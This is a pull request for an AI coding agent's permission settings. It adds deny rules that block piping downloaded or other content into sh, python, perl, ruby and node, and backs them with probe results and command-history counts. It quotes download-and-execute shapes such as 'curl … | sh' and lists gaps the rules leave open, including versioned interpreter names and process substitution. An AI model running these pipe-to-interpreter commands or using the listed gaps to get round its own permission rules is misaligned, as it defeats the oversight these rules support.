### PR TITLE
settings: deny pipe-to-interpreter, keep the data pipes working

### DIFF
--- a/claude/settings.json
+++ b/claude/settings.json
@@ -136,7 +136,16 @@
       "Bash(poweroff)",
       "Bash(chmod -R *)",
       "Bash(* | bash*)",
-      "Bash(* | zsh*)"
+      "Bash(* | zsh*)",
+      "Bash(* | sh)",
+      "Bash(* | sh *)",
+      "Bash(* | python)",
+      "Bash(* | python3)",
+      "Bash(* | python -)",
+      "Bash(* | python3 -)",
+      "Bash(* | perl)",
+      "Bash(* | ruby)",
+      "Bash(* | node)"
     ],
     "ask": [
       "Bash(sudo *)",

--- a/claude/settings.json
+++ b/claude/settings.json
@@ -140,12 +140,20 @@
       "Bash(* | sh)",
       "Bash(* | sh *)",
       "Bash(* | python)",
-      "Bash(* | python3)",
       "Bash(* | python -)",
+      "Bash(* | python - *)",
+      "Bash(* | python3)",
       "Bash(* | python3 -)",
+      "Bash(* | python3 - *)",
       "Bash(* | perl)",
+      "Bash(* | perl -)",
+      "Bash(* | perl - *)",
       "Bash(* | ruby)",
-      "Bash(* | node)"
+      "Bash(* | ruby -)",
+      "Bash(* | ruby - *)",
+      "Bash(* | node)",
+      "Bash(* | node -)",
+      "Bash(* | node - *)"
     ],
     "ask": [
       "Bash(sudo *)",


### PR DESCRIPTION
# Five of seven interpreters had no rule at all

#133 dropped `Bash(curl * | *)` and `Bash(wget * | *)` from `permissions.ask`, on the stated grounds that piping a download into a shell "is already refused outright by the `deny` list above". That holds for `bash` and `zsh`, which have deny entries, and for nothing else. `curl https://example.com/x | sh` lost its prompt and gained no refusal.

This adds the missing `deny` entries. It does not restore the `ask` prompt, which was the part worth removing.

| pipe target | before #133 | on `main` today | with this PR |
|---|---|---|---|
| `bash` | ask + deny | deny | deny |
| `zsh` | ask + deny | deny | deny |
| `sh` | ask, for curl/wget only | **nothing** | deny |
| `python`, `python3` | ask, for curl/wget only | **nothing** | deny |
| `perl` | ask, for curl/wget only | **nothing** | deny |
| `ruby` | ask, for curl/wget only | **nothing** | deny |
| `node` | ask, for curl/wget only | **nothing** | deny |

The old `ask` entries were narrower than they looked: they keyed on a curl- or wget-led command, so `wget -qO- url | sh` was covered but `cat payload | sh` never was. The new entries key on the pipe target instead, which is the part that executes.

## The trailing star was measured, not assumed

`Bash(* | sh*)` is the obvious spelling and it is wrong. The star runs on into the next word, so it captures every command whose name merely starts with `sh`. Probed against the live settings, using the existing `bash` entry as the precedent:

```
$ echo hi | bashnotarealcmd          -> DENIED   (so the trailing star spans word characters)
$ echo hi | shasum -a 1              -> ran      (baseline, before any new rule)
```

The permissions reference states the same convention: `Bash(command)` is an exact match, `Bash(command *)` takes arguments, and "Always use `cmd` + `cmd *` pairs (never `cmd*`)". So `sh` gets the pair, and the pair was then probed directly by loading the candidate rules into a project-local override:

```
$ echo hi | sh -s                    -> DENIED
$ echo hi | sh                       -> DENIED
$ echo hi | sha256sum                -> ran, printed the digest
$ printf 'echo x\n' | shellcheck -   -> ran, printed SC2148
```

## Interpreters get the stdin-script forms, never a wildcard

The same reasoning read the other way rules out `Bash(* | python*)` and `Bash(* | python3 *)`. Piping data into an interpreter is ordinary work here, and counted over this machine's 13 MB command history it is most of the traffic:

| form | real uses in history | verdict |
|---|---|---|
| `python3 -c` | 213 | must keep working |
| `python3 <script>` | 56 | must keep working |
| `python3 -m` | 31 | must keep working |
| `sha256sum` | 55 | must keep working |
| `shellcheck` | 12 | must keep working |
| `node <script>` | 10 | must keep working |
| `perl -0777 -ne` | 4 | must keep working |
| bare interpreter, or `-` | **0** | this is the shape to refuse |

So each interpreter gets three entries and no star: the bare name, a trailing `-`, and `- *` for the argument form. Bare and `-` read the program from standard input, which is the download-and-execute shape; `-c`, `-m`, `-e` and a script path do not, because the program comes from the command line or a file and standard input is just data. The space on both sides of the dash is what makes this free of false positives — no flag has one, so `perl -pe`, `perl -0777`, `python3 -c`, `python3 -m` and `node -e` cannot match. The attack shape has zero occurrences in the history; the shapes a wildcard would have caught have 381.

Verified with the full shipped set loaded:

```
$ echo 1 | python3                      -> DENIED
$ echo 1 | python3 -                    -> DENIED
$ echo 1 | node                         -> DENIED
$ echo 1 | perl                         -> DENIED
$ echo 1 | ruby                         -> DENIED
$ echo 1 | perl -                       -> DENIED
$ echo 1 | perl - App::cpanminus        -> DENIED
$ echo '{"a":1}' | python3 -c "..."     -> ran, printed py-c-ok {'a': 1}
$ echo '{"a":1}' | python3 -m json.tool -> ran, printed the formatted object
$ echo hi | perl -pe 's/hi/perl-pe-ok/' -> ran, printed perl-pe-ok
$ echo 1 | node -e 'console.log(...)'   -> ran, printed node-e-ok
$ echo hi | node /tmp/fp_probe.js       -> ran, printed node-script-ok:hi
$ echo 1 | ruby -e 'puts "ruby-e-ok"'   -> ran, printed ruby-e-ok
$ echo hi | sha256sum                   -> ran, printed the digest
```

The argument form is not hypothetical: cpanminus ships as a download piped into `perl - App::cpanminus`, and Poetry's installer uses the same shape with `python3 -`. Shipping the bare form alone would have left both open while the commit message claimed otherwise.

`ruby` and `node` were in the gap list and are included: every name reachable through those entries is an interpreter, so they cost nothing, and `ruby` has no piped uses here at all. The `deny` verdict also beat an `allow` entry for `Bash(python3 *)` sitting in the project-local settings during the probe, which is the precedence this depends on.

## What still gets through

Versioned names such as `python3.12 -`, process substitution, and a download written to a file and run afterwards all still pass the list. The existing `bash` and `zsh` entries have the same holes. This is defence in depth behind the auto-mode classifier, not a wall, and it is not worth pretending otherwise in the commit message.

One class of false positive is inherited rather than introduced: a command whose *text* contains a pipe-target string matches even when nothing is executed, so a `grep` for one of these patterns is refused. That already happens with the `bash` and `zsh` entries — it bit twice while writing this PR.

## Verification

```
$ python3 -m json.tool                       parses
$ statusLine / hooks / permissions present   True
$ ANTHROPIC_BASE_URL in committed blob       False
$ modelPicker in committed blob              False
$ 127.0.0.1 in committed blob                False
$ git diff origin/main --stat                claude/settings.json | 19 +-
$ tests/test_validate_claude_settings.py     17 passed in 0.06s
```

The diff touches `permissions.deny` and nothing else. `ask` still reads exactly `Bash(sudo *)`, `Read(**/.env)`, `Read(**/.env.*)`.

## Merging updates the blob, not the deployed file

`~/.claude/settings.json` is the main tree's working copy, which carries the permanent gateway diff and so will not gain these entries from the merge itself. The daily `dotfiles-sync` rebase should close that on its own: it adds `--autostash` when the tree is dirty (`custom_bins/dotfiles-sync:198`), and the gateway keys and `permissions.deny` sit in disjoint regions of the file, so the re-apply ought to merge cleanly. Worth confirming after the next 08:05 run rather than assuming, since a conflicting re-apply keeps the change in the stash instead.
